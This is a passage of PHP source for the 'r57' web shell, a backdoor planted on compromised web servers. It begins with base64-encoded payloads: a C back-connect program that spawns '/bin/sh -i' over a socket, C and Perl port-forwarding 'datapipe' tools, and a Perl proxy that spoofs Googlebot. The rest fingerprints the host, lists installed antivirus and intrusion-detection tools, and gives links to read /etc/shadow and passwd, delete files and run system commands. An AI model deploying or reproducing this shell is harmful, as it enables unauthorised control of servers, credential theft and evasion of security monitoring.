sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$datapipe_c = "I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$datapipe_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
$prx_pl = "IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
if ($unix) {
if (!isset($_COOKIE['uname'])) {
$uname = ex('uname -a');
setcookie('uname', $uname);
} else {
$uname = $_COOKIE['uname'];
}
if (!isset($_COOKIE['id'])) {
$id = ex('id');
setcookie('id', $id);
} else {
$id = $_COOKIE['id'];
}
if ($safe_mode) {
$sysctl = '-';
} else if (isset($_COOKIE['sysctl'])) {
$sysctl = $_COOKIE['sysctl'];
} else {
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if (empty($sysctl)) {
$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');
}
if (empty($sysctl)) {
$sysctl = '-';
}
setcookie('sysctl', $sysctl);
}
}
echo $head;
echo '</head>';
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>' . ws(2) . '<font face=tahoma size=2><b>#r57 shell ' . $version . '</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';
echo ws(2) . "<b>" . date("d-m-Y H:i:s") . "</b> Your IP: [<font color=blue>" . gethostbyname($_SERVER["REMOTE_ADDR"]) . "</font>]";
if (isset($_SERVER['X_FORWARDED_FOR'])) {
echo " X_FORWARDED_FOR: [<font color=red>" . $_SERVER['X_FORWARDED_FOR'] . "</font>]";
}
if (isset($_SERVER['CLIENT_IP'])) {
echo " CLIENT_IP: [<font color=red>" . $_SERVER['CLIENT_IP'] . "</font>]";
}
echo " Server IP: [<a href=http://www.ip-adress.com/reverse_ip/" . gethostbyname($_SERVER["HTTP_HOST"]) . " target=iframe><font color=blue>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</font></a>]";
echo "<br>";
echo ws(2) . "PHP version: <b>" . @phpversion() . "</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>" . (($curl_on) ? ("<font color=green>ON</font>") : ("<font color=red>Kapali</font>"));
echo "</b>" . ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if ($mysql_on) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>Kapali</font>";
}
echo "</b>" . ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if ($mssql_on) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>Kapali</font>";
}
echo "</b>" . ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if ($pg_on) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>Kapali</font>";
}
echo "</b>" . ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if ($ora_on) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>Kapali</font>";
}
echo "</b><br>" . ws(2);
echo "Safe_mode: <b>";
echo (($safe_mode) ? ("<font color=green>ON</font>") : ("<font color=red>Kapali</font>"));
echo "</b>" . ws(2);
echo "Open_basedir: <b>";
if ($open_basedir) {
if ('' == ($df = @ini_get('open_basedir'))) {
echo "<font color=red>ini_get disable!</font></b>";
} else {
echo "<font color=green>$df</font></b>";
};
} else {
echo "<font color=red>NONE</font></b>";
}
echo ws(2) . "Safe_mode_exec_dir: <b>";
if (@function_exists('ini_get')) {
if ('' == ($df = @ini_get('safe_mode_exec_dir'))) {
echo "<font color=red>NONE</font></b>";
} else {
echo "<font color=green>$df</font></b>";
};
} else {
echo "<font color=red>ini_get disable!</font></b>";
}
echo ws(2) . "Safe_mode_include_dir: <b>";
if (@function_exists('ini_get')) {
if ('' == ($df = @ini_get('safe_mode_include_dir'))) {
echo "<font color=red>NONE</font></b>";
} else {
echo "<font color=green>$df</font></b>";
};
} else {
echo "<font color=red>ini_get disable!</font></b>";
}
echo "<br>" . ws(2);
echo "Disable functions : <b>";
$df = 'ini_get disable!';
if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) {
echo "<font color=red>NONE</font></b>";
} else {
echo "<font color=red>$df</font></b>";
}
$free = @diskfreespace($dir);
if (!$free) {
$free = 0;
}
$all = @disk_total_space($dir);
if (!$all) {
$all = 0;
}
echo "<br>" . ws(2) . "Free space : <b>" . view_size($free) . "</b> Total space: <b>" . view_size($all) . "</b>";
$ust = '';
if ($unix && !$safe_mode) {
if (which('gcc')) {
$ust.= "gcc,";
}
if (which('cc')) {
$ust.= "cc,";
}
if (which('ld')) {
$ust.= "ld,";
}
if (which('php')) {
$ust.= "php,";
}
if (which('perl')) {
$ust.= "perl,";
}
if (which('python')) {
$ust.= "python,";
}
if (which('ruby')) {
$ust.= "ruby,";
}
if (which('make')) {
$ust.= "make,";
}
if (which('tar')) {
$ust.= "tar,";
}
if (which('nc')) {
$ust.= "netcat,";
}
if (which('locate')) {
$ust.= "locate,";
}
if (which('suidperl')) {
$ust.= "suidperl,";
}
}
if (@function_exists('pcntl_exec')) {
$ust.= "pcntl_exec,";
}
if ($ust) {
echo "<br>" . ws(2) . $lang[$language . '_text137'] . ": <font color=blue>" . $ust . "</font>";
}
$ust = '';
if ($unix && !$safe_mode) {
if (which('kav')) {
$ust.= "kav,";
}
if (which('nod32')) {
$ust.= "nod32,";
}
if (which('bdcored')) {
$ust.= "bitdefender,";
}
if (which('uvscan')) {
$ust.= "mcafee,";
}
if (which('sav')) {
$ust.= "symantec,";
}
if (which('drwebd')) {
$ust = "drwebd,";
}
if (which('clamd')) {
$ust.= "clamd,";
}
if (which('rkhunter')) {
$ust.= "rkhunter,";
}
if (which('chkrootkit')) {
$ust.= "chkrootkit,";
}
if (which('iptables')) {
$ust.= "iptables,";
}
if (which('ipfw')) {
$ust.= "ipfw,";
}
if (which('tripwire')) {
$ust.= "tripwire,";
}
if (which('shieldcc')) {
$ust.= "stackshield,";
}
if (which('portsentry')) {
$ust.= "portsentry,";
}
if (which('snort')) {
$ust.= "snort,";
}
if (which('ossec')) {
$ust.= "ossec,";
}
if (which('lidsadm')) {
$ust.= "lidsadm,";
}
if (which('tcplodg')) {
$ust.= "tcplodg,";
}
if (which('tripwire')) {
$ust.= "tripwire,";
}
if (which('sxid')) {
$ust.= "sxid,";
}
if (which('logcheck')) {
$ust.= "logcheck,";
}
if (which('logwatch')) {
$ust.= "logwatch,";
}
}
if (@function_exists('apache_get_modules') && @in_array('mod_security', apache_get_modules())) {
$ust.= "mod_security,";
}
if ($ust) {
echo "<br>" . ws(2) . $lang[$language . '_text138'] . ": <font color=red>$ust</font>";
}
echo "<br>" . ws(2) . "</b>";
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?phpinfo title=\"" . $lang[$language . '_text46'] . "\"><b>phpinfo</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?phpini title=\"" . $lang[$language . '_text47'] . "\"><b>php.ini</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?cpu title=\"" . $lang[$language . '_text50'] . "\"><b>cpu</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?mem title=\"" . $lang[$language . '_text51'] . "\"><b>mem</b></a> " . $rb;
if (!$unix) {
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?systeminfo title=\"" . $lang[$language . '_text50'] . "\"><b>systeminfo</b></a> " . $rb;
} else {
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?syslog title=\"View syslog.conf\"><b>syslog</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?resolv title=\"View resolv\"><b>resolv</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?hosts title=\"View hosts\"><b>hosts</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?shadow title=\"View shadow\"><b>shadow</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?passwd title=\"" . $lang[$language . '_text95'] . "\"><b>passwd</b></a> " . $rb;
}
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?tmp title=\"" . $lang[$language . '_text48'] . "\"><b>tmp</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?delete title=\"" . $lang[$language . '_text49'] . "\"><b>delete</b></a> " . $rb;
if ($unix && !$safe_mode) {
echo "<br>" . ws(2) . "</b>";
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?procinfo title=\"View procinfo\"><b>procinfo</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?version title=\"View proc version\"><b>version</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?free title=\"View mem free\"><b>free</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?vmstat title=\"View vmstat\"><b>vmstat</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?lspci title=\"View lspci\"><b>lspci</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?lsdev title=\"View lsdev\"><b>lsdev</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?interrupts title=\"View interrupts\"><b>interrupts</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?realise1 title=\"View realise1\"><b>realise1</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?realise2 title=\"View realise2\"><b>realise2</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> " . $rb;
echo "<br>" . ws(2) . "</b>";
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?w title=\"View w\"><b>w</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?who title=\"View who\"><b>who</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?uptime title=\"View uptime\"><b>uptime</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?last title=\"View last -n 10\"><b>last</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?psaux title=\"View ps -aux\"><b>ps aux</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?service title=\"View service\"><b>service</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?netstat title=\"View netstat -a\"><b>netstat</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?fstab title=\"View fstab\"><b>fstab</b></a> " . $rb;
echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> " . $rb;
